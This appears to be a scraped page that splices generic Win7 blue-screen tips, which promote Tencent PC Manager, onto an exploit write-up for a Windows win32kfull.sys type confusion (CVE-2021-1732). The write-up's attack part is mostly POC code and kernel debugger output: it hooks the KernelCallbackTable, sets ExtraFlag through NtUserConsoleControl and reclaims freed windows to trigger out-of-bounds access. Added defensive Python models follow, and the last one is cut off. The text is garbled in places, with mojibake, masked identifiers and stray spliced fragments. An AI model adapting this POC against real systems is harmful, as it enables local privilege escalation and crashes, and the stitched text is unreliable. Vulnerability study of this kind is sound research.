
Win7 blue screen 7b

Further reading:


There are many causes of computer blue screens; OP can rule them out one by one using the methods below.
1. Poor cooling: clean the dust off the fan, oil it, or replace it; for a desktop, add a temporary fan inside the case to assist cooling; for a laptop, add a cooling pad.
2. Too much dust inside the machine causing poor contact: clean the case and reseat every connector firmly.
3. Loose memory modules: remove the memory, clean the slot, wipe the module's gold fingers clean, then reinsert it firmly.
4. Check and repair disk errors. You can use Tencent PC Manager to run a checkup: open Tencent PC Manager – Home – Checkup.
5. Clean the disk and defragment it. Using Tencent PC Manager to clean up junk is enough: open Tencent PC Manager – Clean junk – Start scan – Done.
6. Hard disk aging, or bad tracks and bad sectors caused by improper use: use tool software to troubleshoot, and if the damage is severe, replace the drive. OP can use Tencent PC Manager to check: open Tencent PC Manager – Toolbox – Hardware check.
7. Too many programs at startup exhaust system resources, causing insufficient resources and a blue screen. I suggest OP close some software as appropriate: open Tencent PC Manager – Toolbox – Process manager – disable the software you do not need.
8. Remove viruses and trojans. You can use Tencent PC Manager to scan: open Tencent PC Manager – Lightning antivirus – Full scan – Done.


Vulnerability description

The win32kfull!xxxClientAllocWindowClassExtraBytes function in the kernel module win32kfull.sys has a Type Confusion vulnerability. Exploiting it yields out-of-bounds read/write, which ultimately allows local privilege escalation.

Windows versions affected according to the official advisory:

Windows 10 Version 1803/1809/1909/2004/20h2

Windows Server, version 1909/20H2 (Server Core installation)

Windows 10 Version for 32-bit Systems

Windows Server 2019

Vulnerability analysis

Windows version analyzed: Win10 20H2 19042.508

The Type Confusion vulnerability lies in win32kfull!xxxCreateWindowEx; the pseudocode of the vulnerable spot in that function is as follows:

[Figure: pseudocode of win32kfull!xxxCreateWindowEx around the vulnerable call (line 974 in the screenshot)]

How does the vulnerability come about? That starts with window creation.


Before creating a custom window, a custom window class must be registered. The window class structure is as follows:

typedef struct tagWNDCLASSA {
    UINT      style;
    WNDPROC   lpfnWndProc;
    int       cbClsExtra;
    int       cbWndExtra;
    HINSTANCE hInstance;
    HICON     hIcon;
    HCURSOR   hCursor;
    HBRUSH    hbrBackground;
    LPCSTR    lpszMenuName;
    LPCSTR    lpszClassName;
} WNDCLASSA, *PWNDCLASSA, *NPWNDCLASSA, *LPWNDCLASSA;

After filling in the members of the window class structure, CreateWindow(ExA/W) can be called to create the window. The overall execution flow from R0 to R3 (the call stack, kernel frames first) is as follows:

00 fffffe82`32d3f848 fffff467`52aa51a9 win32kfull!xxxCreateWindowEx
01 fffffe82`32d3f850 fffff467`5285519e win32kfull!NtUserCreateWindowEx+0x679
02 fffffe82`32d3f9f0 fffff802`36e058b5 win32k!NtUserCreateWindowEx+0xc2
03 fffffe82`32d3fa90 00007ffe`d86e1ec4 nt!KiSystemServiceCopyEnd+0x25
04 00000062`2ad9f7d8 00007ffe`d8ca7d8b win32u!NtUserCreateWindowEx+0x14
05 00000062`2ad9f7e0 00007ffe`d8ca7958 USER32!VerNtUserCreateWindowEx+0x20f
06 00000062`2ad9fb70 00007ffe`d8ca3c92 USER32!CreateWindowInternal+0x1a4
07 00000062`2ad9fcd0 00007ff7`9418144d USER32!CreateWindowExA+0x82

As the stack shows, window creation eventually enters the vulnerable function win32kfull!xxxCreateWindowEx. So how do we get win32kfull!xxxCreateWindowEx to call win32kfull!xxxClientAllocWindowClassExtraBytes (that is, reach line 974 in the figure above)?

When the cbWndExtra member of the tagWNDCLASSA class (the number of extra bytes allocated for each window instance) is non-zero, win32kfull!xxxClientAllocWindowClassExtraBytes is called, and that function is where the problem lies.

v50 is a pointer to a tagWND structure. tagWND changed somewhat between the Win7 and Win10 versions; its key members are shown below (image from the RedDrip team). (_QWORD *)(*((_QWORD *)v50 + 5) + 0x128i64) is the pExtraBytes shown in the figure below; in the normal execution flow it is assigned the heap address obtained by win32kfull!xxxClientAllocWindowClassExtraBytes. How do we know it is a heap address? See below.

[Figure: key members of the tagWND structure (source: RedDrip team)]

對(duì)函數(shù)win32kfull!xxxClientAllocWindowClassExtraBytes進(jìn)行反編譯,得到以下結(jié)果:

volatile void *__fastcall xxxClientAllocWindowClassExtraBytes(SIZE_T Length)
{
    SIZE_T v1; // rdi
    int v2; // ebx
    __int64 *v3; // rcx
    volatile void *v4; // rbx
    __int64 CurrentProcessWow64Process; // rax
    unsigned __int64 v7; // [rsp+30h] [rbp-38h] BYREF
    volatile void *v8; // [rsp+38h] [rbp-30h]
    char v9; // [rsp+70h] [rbp+8h] BYREF
    char v10; // [rsp+78h] [rbp+10h] BYREF
    int v11; // [rsp+80h] [rbp+18h] BYREF
    int v12; // [rsp+88h] [rbp+20h] BYREF

    v1 = (unsigned int)Length;
    v7 = 0i64;
    v11 = 0;
    v8 = 0i64;
    v12 = Length;
    if ( gdwInAtomicOperation && (gdwExtraInstrumentations & 1) != 0 )
        KeBugCheckEx(0x160u, gdwInAtomicOperation, 0i64, 0i64, 0i64);
    ReleaseAndReacquirePerObjectLocks::ReleaseAndReacquirePerObjectLocks((ReleaseAndReacquirePerObjectLocks *)&v10);
    LeaveEnterCritProperDisposition::LeaveEnterCritProperDisposition((LeaveEnterCritProperDisposition *)&v9);
    EtwTraceBeginCallback(0x7Bi64);
    // API number 0x7B: call back into user mode with the requested length,
    // expecting a 0x18-byte result whose first qword is the allocated address
    v2 = KeUserModeCallback(0x7Bi64, &v12, 4i64, &v7, &v11);
    EtwTraceEndCallback(0x7Bi64);
    LeaveEnterCritProperDisposition::~LeaveEnterCritProperDisposition((LeaveEnterCritProperDisposition *)&v9);
    ReleaseAndReacquirePerObjectLocks::~ReleaseAndReacquirePerObjectLocks((ReleaseAndReacquirePerObjectLocks *)&v10);
    if ( v2 < 0 || v11 != 0x18 )
        return 0i64;
    v3 = (__int64 *)v7;
    if ( v7 + 8 < v7 || v7 + 8 > MmUserProbeAddress )
        v3 = (__int64 *)MmUserProbeAddress;
    v8 = (volatile void *)*v3;
    v4 = v8;
    CurrentProcessWow64Process = PsGetCurrentProcessWow64Process();
    // only probes that the returned user-mode address is readable;
    // the window's ExtraFlag is not re-checked here
    ProbeForRead(v4, v1, CurrentProcessWow64Process != 0 ? 1 : 4);
    return v4;
}

The function calls KeUserModeCallback to return to user mode and run a callback. The prototype of KeUserModeCallback is:

NTSTATUS KeUserModeCallback (
    IN ULONG ApiNumber,
    IN PVOID InputBuffer,
    IN ULONG InputLength,
    OUT PVOID *OutputBuffer,
    IN PULONG OutputLength
);

First, from API number 0x7b the callback can be identified as user32!_xxxClientAllocWindowClassExtraBytes:

0: kd> dt ntdll!_PEB @$peb Ke*
+0x058 KernelCallbackTable : 0x00007fff`4e1e1070 Void
0: kd> u poi(0x00007fff`4e1e1070 + 7b * 8)
user32!_xxxClientAllocWindowClassExtraBytes:
00007fff`4e177840 4883ec48 sub rsp,48h
00007fff`4e177844 8364242800 and dword ptr [rsp+28h],0
00007fff`4e177849 488364243000 and qword ptr [rsp+30h],0
00007fff`4e17784f 448b01 mov r8d,dword ptr [rcx]
00007fff`4e177852 ba08000000 mov edx,8
00007fff`4e177857 488b0dd2b70800 mov rcx,qword ptr [user32!pUserHeap (00007fff`4e203030)]
00007fff`4e17785e 48ff154bb20600 call qword ptr [user32!_imp_RtlAllocateHeap (00007fff`4e1e2ab0)]
00007fff`4e177865 0f1f440000 nop dword ptr [rax+rax]

對(duì)user32!_xxxClientAllocWindowClassExtraBytes進(jìn)行反匯編,得到以下結(jié)果:

NTSTATUS __fastcall _xxxClientAllocWindowClassExtraBytes(unsigned int *a1)
{
    PVOID Result; // [rsp+20h] [rbp-28h] BYREF
    int v3; // [rsp+28h] [rbp-20h]
    __int64 v4; // [rsp+30h] [rbp-18h]

    v3 = 0;
    v4 = 0i64;
    // *a1 is the Length passed in from the kernel
    Result = RtlAllocateHeap(pUserHeap, 8u, *a1);
    // hand the 0x18-byte result block (address first) back to the kernel
    return NtCallbackReturn(&Result, 0x18u, 0);
}

The function calls RtlAllocateHeap to allocate *a1 (Length) bytes from the user heap pointed to by pUserHeap, then returns to kernel mode via NtCallbackReturn carrying the heap address. The prototype of NtCallbackReturn is:

[Figure: prototype of NtCallbackReturn]

So we obtain the following execution flow:

xxxClientAllocWindowClassExtraBytes > KeUserModeCallback > _xxxClientAllocWindowClassExtraBytes > NtCallbackReturn

All of the above is the normal execution flow; next comes how the vulnerability arises.

pExtraBytes (offset 0x128) is tied to the ExtraFlag (offset 0xe8) flag: when ExtraFlag & 0x800 == 0, pExtraBytes is a memory pointer, namely the heap address above; when ExtraFlag & 0x800 != 0, pExtraBytes is a memory offset.

Because the tagWND's ExtraFlag is not validated after win32kfull!xxxClientAllocWindowClassExtraBytes completes, a malicious attacker can, inside the callback, set the tagWND's ExtraFlag to ExtraFlag | 0x800, so that pExtraBytes is now treated as a memory offset rather than a memory address, and then control the offset and likewise return it to the kernel via NtCallbackReturn. This produces an out-of-bounds read/write, from which read/write primitives are obtained, ultimately leading to local privilege escalation.
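The flag-dependent interpretation of pExtraBytes and the missing re-validation after the user-mode callback, as an added Python model. This is not the page's code and not Windows kernel code: the names Wnd, Heaps, alloc_extra_bytes_vulnerable, alloc_extra_bytes_hardened and the heap bases and sizes are assumptions constructed for the model, and the hardened variant follows the general "re-check after returning from user mode" pattern rather than the exact vendor patch, which this page does not show.

```python
"""
Model of the pExtraBytes / ExtraFlag type confusion described above.

A tagWND-like record whose pExtraBytes field is read either as a user-heap
pointer or as an offset into the desktop heap depending on bit 0x800 of
ExtraFlag, a kernel-side allocation routine that calls back into "user mode"
before storing the result, and a hardened variant that re-validates the flag
after the callback returns.  All addresses and sizes are constructed.
"""
from dataclasses import dataclass, field

EXTRA_FLAG_OFFSET_MODE = 0x800   # bit from the page: pExtraBytes is an offset when set


@dataclass
class Wnd:
    """Minimal stand-in for tagWND, holding only the fields the page discusses."""
    cb_wnd_extra: int            # size requested via WNDCLASSA.cbWndExtra
    extra_flag: int = 0          # tagWND.ExtraFlag (offset 0xe8 on the page)
    p_extra_bytes: int = 0       # tagWND.pExtraBytes (offset 0x128 on the page)


@dataclass
class Heaps:
    """The two regions the model cares about (constructed, not real addresses)."""
    desktop_base: int = 0x100000
    desktop_size: int = 0x1000
    user_heap: dict = field(default_factory=dict)   # address -> bytearray
    next_user_addr: int = 0x400000

    def user_alloc(self, size: int) -> int:
        """What user32!_xxxClientAllocWindowClassExtraBytes does: RtlAllocateHeap on pUserHeap."""
        addr = self.next_user_addr
        self.user_heap[addr] = bytearray(size)
        self.next_user_addr += 0x1000
        return addr


def extra_bytes_region(wnd: Wnd, heaps: Heaps):
    """Resolve where the kernel believes the extra bytes live, honouring ExtraFlag.

    Returns (start_address, size).  In offset mode the value is added to the
    desktop heap base and must stay inside the desktop heap; otherwise the
    window's extra bytes would be accessed outside any valid region, which is
    the out-of-bounds access the page describes.
    """
    if wnd.extra_flag & EXTRA_FLAG_OFFSET_MODE:
        start = heaps.desktop_base + wnd.p_extra_bytes
        end = start + wnd.cb_wnd_extra
        if start < heaps.desktop_base or end > heaps.desktop_base + heaps.desktop_size:
            raise MemoryError(f"extra bytes at {start:#x} lie outside the desktop heap")
        return start, wnd.cb_wnd_extra
    if wnd.p_extra_bytes not in heaps.user_heap:
        raise MemoryError(f"{wnd.p_extra_bytes:#x} is not a live user-heap block")
    return wnd.p_extra_bytes, wnd.cb_wnd_extra


def alloc_extra_bytes_vulnerable(wnd: Wnd, heaps: Heaps, callback) -> None:
    """Unpatched behaviour: call back to user mode and store whatever comes back.

    The flag is never re-read after the callback, so a callback that flips
    ExtraFlag and returns a number turns the stored 'pointer' into an offset.
    """
    wnd.p_extra_bytes = callback(wnd, heaps)


def alloc_extra_bytes_hardened(wnd: Wnd, heaps: Heaps, callback) -> None:
    """Re-validate after the callback (assumed mitigation pattern, not the exact vendor patch).

    If the window was switched into offset mode while control was in user
    mode, the returned value cannot be a pointer, so nothing is stored.
    """
    flag_before = wnd.extra_flag & EXTRA_FLAG_OFFSET_MODE
    result = callback(wnd, heaps)
    if (wnd.extra_flag & EXTRA_FLAG_OFFSET_MODE) != flag_before:
        raise PermissionError("ExtraFlag changed during the user-mode callback; allocation rejected")
    if result not in heaps.user_heap:
        raise PermissionError("callback did not return a live user-heap block")
    wnd.p_extra_bytes = result


def benign_callback(wnd: Wnd, heaps: Heaps) -> int:
    """The normal user32 callback: allocate cbWndExtra bytes and return the address."""
    return heaps.user_alloc(wnd.cb_wnd_extra)


def flag_flipping_callback(wnd: Wnd, heaps: Heaps) -> int:
    """Models the page's scenario: flip the flag from user mode and return an offset."""
    wnd.extra_flag |= EXTRA_FLAG_OFFSET_MODE
    return 0x1234                # the offset value the page's POC returns


def run_scenario(alloc, callback) -> str:
    """Run one allocation and report whether the extra-bytes region resolves safely."""
    heaps = Heaps()
    wnd = Wnd(cb_wnd_extra=0x10)
    try:
        alloc(wnd, heaps, callback)
        extra_bytes_region(wnd, heaps)
        return "ok"
    except MemoryError:
        return "out-of-bounds"
    except PermissionError:
        return "rejected"


if __name__ == "__main__":
    for name, alloc in (("vulnerable", alloc_extra_bytes_vulnerable),
                        ("hardened", alloc_extra_bytes_hardened)):
        print(name, "benign callback:", run_scenario(alloc, benign_callback))
        print(name, "flag-flipping callback:", run_scenario(alloc, flag_flipping_callback))
```

With the benign callback both variants behave identically; with the flag-flipping callback the vulnerable variant ends up resolving an offset past the constructed desktop heap, while the hardened variant refuses the allocation before the inconsistent value is ever stored.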


Vulnerability verification

Two key points for verifying the vulnerability:

The path to reach the vulnerability
The environment to trigger the vulnerability

Path to reach the vulnerability: set tagWNDCLASSA's cbWndExtra and call CreateWindow to create a window.

Environment to trigger the vulnerability: modify the tagWND's ExtraFlag inside the callback and return a chosen offset value.

Writing the POC

Before writing the POC, a few questions still need to be worked out:

How to obtain the window handle while CreateWindow is still executing (the function has not returned)
How to modify the tagWND's ExtraFlag

問(wèn)題1:在參考了網(wǎng)上公開(kāi)的一些方法后,我選擇了一種重利用的方法,這跟池噴射后構(gòu)造指定大小的空洞來(lái)進(jìn)行控制分配有著相似的地方。簡(jiǎn)單來(lái)說(shuō),就是分配一定數(shù)量的窗口(窗口類相同),緊接著銷毀這些窗口,第二創(chuàng)建要觸發(fā)漏洞的窗口(窗口的pExtraBytes為特殊的數(shù)值),觸發(fā)漏洞的窗口就會(huì)被分配到某個(gè)剛剛銷毀的窗口所在的內(nèi)存區(qū)域。觸發(fā)漏洞的窗口完成占坑后,我們是怎么獲取到窗口句柄的呢?原來(lái)我們可以通過(guò)一開(kāi)始創(chuàng)建好的窗口的句柄泄露tagWND在用戶態(tài)的內(nèi)存指針,其首地址存儲(chǔ)的就是窗口句柄,偏移0xc8處存儲(chǔ)的是pExtraBytes,通過(guò)對(duì)特殊值的比較,就可以搜索到觸發(fā)漏洞的窗口的用戶態(tài)tagWND首地址,讀取其首地址的值,即可獲得其窗口句柄

問(wèn)題2:大神們發(fā)現(xiàn),win32kfull!xxxConsoleControl函數(shù)可以設(shè)置tagWND的ExtraFlag,調(diào)用此函數(shù)的用戶態(tài)API為NtUserConsoleControl

__int64 __fastcall xxxConsoleControl(int a1, struct _CONSOLE_PROCESS_INFO *a2, int a3)
{

    v16 = (_QWORD *)ValidateHwnd(*(_QWORD *)a2);    // get the tagWND address
    v17 = (__int64)v16;

    v18 = v16 + 5;                                   // get the pwnd address (the real tagWND)

    // if ExtraFlag & 0x800 != 0
    if ( (*(_DWORD *)(*v18 + 0xE8i64) & 0x800) != 0 )
    {
        v23 = (_DWORD *)(*(_QWORD *)(*(_QWORD *)(v17 + 0x18) + 0x80i64) + *(_QWORD *)(v22 + 0x128));
    }
    else
    {
        // allocate from the desktop heap
        v23 = (_DWORD *)DesktopAlloc(*(_QWORD *)(v17 + 0x18), *(unsigned int *)(v22 + 0xC8), 0i64);

        if ( *(_QWORD *)(*v18 + 0x128i64) )
        {
            CurrentProcess = PsGetCurrentProcess();
            v30 = *(_DWORD *)(*v18 + 0xC8i64);
            v29 = *(const void **)(*v18 + 0x128i64);
            memmove(v23, v29, v30);
            if ( (*(_DWORD *)(CurrentProcess + 1124) & 0x40000008) == 0 )
                xxxClientFreeWindowClassExtraBytes(v17, *(_QWORD *)(*(_QWORD *)(v17 + 40) + 0x128i64));
        }
        // from here on pExtraBytes holds an offset from the desktop heap base
        *(_QWORD *)(*v18 + 0x128i64) = (char *)v23 - *(_QWORD *)(*(_QWORD *)(v17 + 24) + 0x80i64);
    }
    if ( v23 )
    {
        *v23 = *((_DWORD *)a2 + 2);
        v23[1] = *((_DWORD *)a2 + 3);
    }

    // set ExtraFlag |= 0x800u
    *(_DWORD *)(*v18 + 0xE8i64) |= 0x800u;
    goto LABEL_33;
}

}

在上述問(wèn)題得以解決后,就可以愉快地編寫(xiě)POC了

獲取一些關(guān)鍵函數(shù)地址:HMValidateHandle函數(shù)可以根據(jù)窗口句柄獲取用戶態(tài)tagWND的地址,雖然它不是導(dǎo)出函數(shù),但是可以在I**enu函數(shù)所在的內(nèi)存區(qū)域進(jìn)行搜索;NtCallbackReturn函數(shù)可以將結(jié)果返回給內(nèi)核,上文已經(jīng)提及VOID InitFunction()
{
HMODULE hNtdll = LoadLibraryA("ntdll.dll"), hWin = LoadLibraryA("win32u.dll"), hUser = LoadLibraryA("user32.dll");

if (!hNtdll || !hWin || !hUser)
{
ErrorOutput("[-] Failed to load the ntdll.dll, win32u.dll, user32.dlln");
}

global::NtCallbackReturn = (pNtCallbackReturn)GetProcAddress(hNtdll, "NtCallbackReturn");
global::NtUserConsoleControl = (pNtUserConsoleControl)GetProcAddress(hWin, "NtUserConsoleControl");
if (!global::NtCallbackReturn || !global::NtUserConsoleControl)
{
ErrorOutput("[-] Failed to get NtCallbackReturn, NtUserConsoleControln");
}

PBYTE i**enu = (PBYTE)GetProcAddress(hUser, "I**enu");
if (!i**enu)
{
ErrorOutput("[-] Failed to get NtCallbackReturn, NtUserConsoleControln");
}

while (*i**enu++ != 0xe8);
global::HMValidateHandle = (pHMValidateHandle)(i**enu + 4 + (*(PLONG32)i**enu));

if (!global::HMValidateHandle)
{
ErrorOutput("[-] Failed to get HMValidateHandlen");
}
}調(diào)用VirtualProtect函數(shù)修改回調(diào)函數(shù)表所在的內(nèi)存頁(yè)的屬性,替換相應(yīng)的回調(diào)函數(shù)為自定義的回調(diào)函數(shù):__readgsqword(0x60)獲取到當(dāng)前進(jìn)程的PEB結(jié)構(gòu)地址,PEB結(jié)構(gòu)偏移0x58處就是KernelCallbackTable(回調(diào)函數(shù)表)3: kd> dt ntdll!_PEB KernelCallbackTable
+0x058 KernelCallbackTable : Ptr64 Voi**OID HookCallBack()
{
ULONG64 KernelCallbackTable = *(PULONG64)(__readgsqword(0x60) + 0x58);
if (!KernelCallbackTable)
{
printf("[-] Failed to get kernel callback tablen");
exit(1);
}

DWORD oldProtect = 0;
ULONG64 target = KernelCallbackTable + (0x7B * 8);

VirtualProtect((LPVOID)target, 0x100, PAGE_EXECUTE_READWRITE, &oldProtect);

global::orginCallBack = (pCallBack)(*(PULONG64)target);
*(PULONG64)target = (ULONG64)FakeCallBack;

VirtualProtect((LPVOID)target, 0x100, oldProtect, &oldProtect);
}自定義的回調(diào)函數(shù):NtCallbackReturn用于返回指定的偏移給內(nèi)核,調(diào)用方法仿照_xxxClientAllocWindowClassExtraBytes,NtUserConsoleControl的調(diào)用參數(shù)有一點(diǎn)講究,在內(nèi)核調(diào)用xxxConsoleControl之前調(diào)用的是NtUserConsoleControl,其中會(huì)有一些小檢查,即第一個(gè)參數(shù)不能大于6,第三個(gè)參數(shù)不能大于0x18win7 藍(lán)屏 7b

xxxConsoleControl performs further checks of its own; in the end the first argument is 6 and the last argument is 0x10.

[Figure: argument checks in xxxConsoleControl]

VOID FakeCallBack(PULONG32 para)
{
    if (*para == global::magicNum && global::flag)
    {
        printf("[+] Enter the fake callback\n");
        HWND target = NULL;

        // search the leaked user-mode tagWND copies for the special value at offset 0xc8
        for (ULONG32 idx = 2; idx < 20; ++idx)
        {
            if (*(PULONG64)(global::pWnds[idx] + 0xc8) == global::magicNum)
            {
                target = (HWND)*(PULONG64)global::pWnds[idx];
                printf("[+] Find the target wnd handle: 0x%I64x\n", (ULONG64)target);
                printf("[+] Find the target wnd address: 0x%I64x\n", (ULONG64)global::pWnds[idx]);
                break;
            }
        }

        // set flag
        ULONG64 buffer1[2] = { (ULONG64)target, 0 };
        global::NtUserConsoleControl(6, buffer1, 0x10);

        // set offset
        ULONG64 buffer2[3] = { 0x1234, 0, 0 };
        global::NtCallbackReturn(buffer2, 0x18, 0);
    }

    return global::orginCallBack(para);
}

Window creation and destruction: first create 20 normal windows and leak their addresses with HMValidateHandle, then free windows 2 to 19 (freeing all of them also works), create the triggering window, and finally destroy the triggering window, which triggers the BSOD.
{
InitFunction();
HookCallBack();

HINSTANCE hInstance = GetModuleHandleA(NULL);
WNDCLASSA wc{ 0 };
wc.lpfnWndProc = WindowProc;
wc.hInstance = hInstance;
wc.lpszClassName = "Normal";
wc.cbWndExtra = 0x10;

ATOM normalClass = RegisterClassA(&wc);
if (!normalClass)
{
ErrorOutput("[-] Failed to register normal classn");
}

wc.lpszClassName = "Magic";
wc.cbWndExtra = global::magicNum;
ATOM magicClass = RegisterClassA(&wc);
if (!magicClass)
{
ErrorOutput("[-] Failed to register magic classn");
}

for (ULONG32 idx = 0; idx < 20; ++idx)
{
global::hWnds[idx] = CreateWindowExA(0x8000000, "Normal", "NormalWnd", 0x8000000, 0, 0, 0, 0, 0, 0, hInstance, NULL);
if (!global::hWnds[idx])
{
ErrorOutput("[-] Failed to create normal windown");
}
global::pWnds[idx] = global::HMValidateHandle((HMENU)global::hWnds[idx], 1);
}

for (ULONG32 idx = 2; idx < 20; ++idx)
{
if (global::hWnds[idx])
{
DestroyWindow(global::hWnds[idx]);
}
}

global::flag = TRUE;
HWND hMagic = CreateWindowExA(0x8000000, "Magic", "MagicWnd", 0x8000000, 0, 0, 0, 0, 0, 0, hInstance, NULL);
if (!hMagic)
{
ErrorOutput("[-] Failed to create magic windown");
}

DestroyWindow(hMagic);
return 0;
}POC調(diào)試

在回調(diào)函數(shù)內(nèi)設(shè)置斷點(diǎn),根據(jù)命令行打印出來(lái)的指針查看內(nèi)存,可以看到首地址存儲(chǔ)的句柄,偏移0xc8處即為特殊的數(shù)值0xabcd

2: kd> dq 27dab7814c0 l20
0000027d`ab7814c0 00000000`00020350 00000000`000314c0
0000027d`ab7814d0 00000000`00000000 08000000`08000000
0000027d`ab7814e0 00007ff6`13040000 00000000`00000000
0000027d`ab7814f0 00000000`000012b0 00000000`00000000
0000027d`ab781500 00000000`00000000 00000000`00000000
0000027d`ab781510 00000000`00000000 00000000`00000000
0000027d`ab781520 00000000`00000000 00000000`00000000
0000027d`ab781530 00000000`00000000 00007ff6`130410a0
0000027d`ab781540 00000000`0000f160 00000000`00000000
0000027d`ab781550 00000000`00000000 00000000`00000000
0000027d`ab781560 00000000`00000000 00000000`00000000
0000027d`ab781570 00000000`00000000 00000000`00000000
0000027d`ab781580 00000000`00000000 00000000`0000abcd
0000027d`ab781590 00000000`00020221 00000000`00000000
0000027d`ab7815a0 00000000`00000000 00000001`00000000
0000027d`ab7815b0 00000000`00000000 00000000`00000000
2: kd> ? 0000027d`ab781588-0000027d`ab7814c0
Evaluate expression: 200 = 00000000`000000c8

Tracing xxxConsoleControl in the kernel and inspecting the kernel-mode window structure: while the function has not yet completed, the ExtraFlag flag is not set; once it completes, the flag is set.

2: kd> dq ffff8a5905879150 l10
ffff8a59`05879150 00000000`00020350 00000000`00000001
ffff8a59`05879160 ffff8a59`02ee48a0 ffff8f01`0b551de0
ffff8a59`05879170 ffff8a59`05879150 ffff8a59`012314c0
ffff8a59`05879180 00000000`000314c0 00000000`00000000
ffff8a59`05879190 00000000`00000000 00000000`00000000
ffff8a59`058791a0 00000000`00000000 00000000`00000000
ffff8a59`058791b0 00000000`00000000 ffff8a59`00830a80
ffff8a59`058791c0 00000000`00000000 00000000`00000000
2: kd> dq poi(@rax+28)
ffff8a59`012314c0 00000000`00020350 00000000`000314c0
ffff8a59`012314d0 00000000`00000000 08000000`08000000
ffff8a59`012314e0 00007ff6`13040000 00000000`00000000
ffff8a59`012314f0 00000000`000012b0 00000000`00000000
ffff8a59`01231500 00000000`00000000 00000000`00000000
ffff8a59`01231510 00000000`00000000 00000000`00000000
ffff8a59`01231520 00000000`00000000 00000000`00000000
ffff8a59`01231530 00000000`00000000 00007ff6`130410a0
2: kd> ? poi(poi(@rax+28) + e8)
Evaluate expression: 4294967296 = 00000001`00000000
2: kd> g
Break instruction exception - code 80000003 (first chance)
0033:00007fff`f6820192 cc int 3
1: kd> dq ffff8a59`012314c0+e8 L1
ffff8a59`012315a8 00000001`00100818
1: kd> ? 00000001`00100818 & 0x800
Evaluate expression: 2048 = 00000000`00000800

Set a breakpoint on the instruction following the call to win32kfull!xxxClientAllocWindowClassExtraBytes inside xxxCreateWindowEx.

[Figure: the call to xxxClientAllocWindowClassExtraBytes inside xxxCreateWindowEx]

3: kd> ba e1 ffff8348`7883ce09
3: kd> g
Breakpoint 0 hit
win32kfull!xxxCreateWindowEx+0x1259:
ffff8348`7883ce09 488bc8 mov rcx,rax
3: kd> r rax
rax=0000000000001234

After this xxxCreateWindowEx call completes, continuing into the POC's DestroyWindow triggers the blue screen:

NOTE: The trap frame does not contain all registers.
Some register values may be zeroed or incorrect.
rax=00000000000c2000 rbx=0000000000000000 rcx=00000000000c2000
rdx=0000000000000000 rsi=0000000000000000 rdi=0000000000000000
rip=fffff80557e61cf1 rsp=fffff080407c6740 rbp=ffff8a5901200040
r8=ffff8a590113f000 r9=00000000014b92ca r10=ffff8a5901201234
r11=014b92ca3db812e6 r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0 nv up ei ng nz na po nc
nt!RtlpHpVsContextFree+0x41:
fffff805`57e61cf1 410fb74822 movzx ecx,word ptr [r8+22h] ds:ffff8a59`0113f022=????
Resetting default scope

STACK_TEXT:
fffff080`407c5b68 fffff805`580c7422 : ffff8a59`0113f022 00000000`00000003 fffff080`407c5cd0 fffff805`57f3bb20 : nt!DbgBreakPointWithStatus
fffff080`407c5b70 fffff805`580c6b12 : fffff805`00000003 fffff080`407c5cd0 fffff805`57ff3960 00000000`00000050 : nt!KiBugCheckDebugBreak+0x12
fffff080`407c5bd0 fffff805`57fdf327 : fffff805`582844f8 fffff805`580f0fb5 00000000`00000000 00000000`00000000 : nt!KeBugCheck2+0x952
fffff080`407c62d0 fffff805`58001663 : 00000000`00000050 ffff8a59`0113f022 00000000`00000000 fffff080`407c65b0 : nt!KeBugCheckEx+0x107
fffff080`407c6310 fffff805`57e90edf : fffff080`407f1000 00000000`00000000 00000000`00000000 ffff8a59`0113f022 : nt!MiSystemFault+0x1d6933
fffff080`407c6410 fffff805`57fed320 : 00000000`00000000 fffff805`57e84817 00000000`00000001 00000000`00000000 : nt!MmAccessFault+0x34f
fffff080`407c65b0 fffff805`57e61cf1 : ffffa10d`a650ec60 fffff805`5905208d 00000000`00000350 ffff8f01`0e353080 : nt!KiPageFault+0x360
fffff080`407c6740 fffff805`57f0b7fa : 00000000`00000008 fffff080`407c6840 00000000`00000008 00000000`00000003 : nt!RtlpHpVsContextFree+0x41
fffff080`407c67e0 fffff805`57f0b77c : ffff8a59`01200000 00000000`00000000 ffff8a59`01201234 00000000`000002a0 : nt!RtlpFreeHeapInternal+0x5a
fffff080`407c6860 ffff8a2a`1d249973 : 00000000`00001234 00000000`00000000 00000000`00000000 ffff8a59`05879150 : nt!RtlFreeHeap+0x3c
fffff080`407c68a0 ffff8a2a`1d2463be : ffff8a59`00693920 00000000`08000100 ffff8a59`02ee48a0 ffff8a59`05879150 : win32kfull!xxxFreeWindow+0x4bf
fffff080`407c69d0 ffff8a2a`1d319e3a : 00007ff6`13043474 00000000`00000000 00007ff6`13040000 00000000`00000020 : win32kfull!xxxDestroyWindow+0x3ae
fffff080`407c6ad0 fffff805`57ff0b18 : 0000027d`40000600 0000000a`00000000 ffffffff`ffe17b80 ffff8f01`0d3e6be0 : win32kfull!NtUserDestroyWindow+0x3a
fffff080`407c6b00 00007fff`f5cb23e4 : 00007ff6`1304151d 00000000`00000098 00000000`00000000 00007ff6`00000000 : nt!KiSystemServiceCopyEnd+0x28
000000d5`26dffd28 00007ff6`1304151d : 00000000`00000098 00000000`00000000 00007ff6`00000000 00000000`00000000 : win32u!NtUserDestroyWindow+0x14
000000d5`26dffd30 00000000`00000098 : 00000000`00000000 00007ff6`00000000 00000000`00000000 00000000`00000000 : poc!main+0x33d [D:SelfLearnC++ProjectExploitExploit2021-1732-EXP.cpp @ 170]
000000d5`26dffd38 00000000`00000000 : 00007ff6`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : 0x98
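From a detection standpoint, the most visible user-mode artifact of the POC above is the modified KernelCallbackTable: the table lives at PEB+0x58, is indexed by API number, and every legitimate slot (including 0x7B, user32!_xxxClientAllocWindowClassExtraBytes) points inside user32.dll's mapped image, so a slot that resolves anywhere else is what a memory scanner would flag. The following is an added Python audit of such a table over constructed sample data; it is not code from the page or the POC, the module base addresses and sizes in MODULES are assumptions, and only the index 0x7B and the user32 address range come from the kd output on the page.

```python
"""
Audit a process's KernelCallbackTable: every entry should resolve into
user32.dll.  The table and module map below are constructed sample data.
"""

# constructed module map: name -> (base, size); the user32 range is chosen so
# that the addresses seen in the page's kd output (0x7fff4e177840,
# 0x7fff4e203030) fall inside it
MODULES = {
    "user32.dll": (0x00007fff4e140000, 0x000E0000),
    "ntdll.dll":  (0x00007fff4f1d0000, 0x001F0000),
}

# the one API number this page discusses; other slots get a generic name
API_NAMES = {0x7B: "_xxxClientAllocWindowClassExtraBytes"}


def module_for(address, modules=MODULES):
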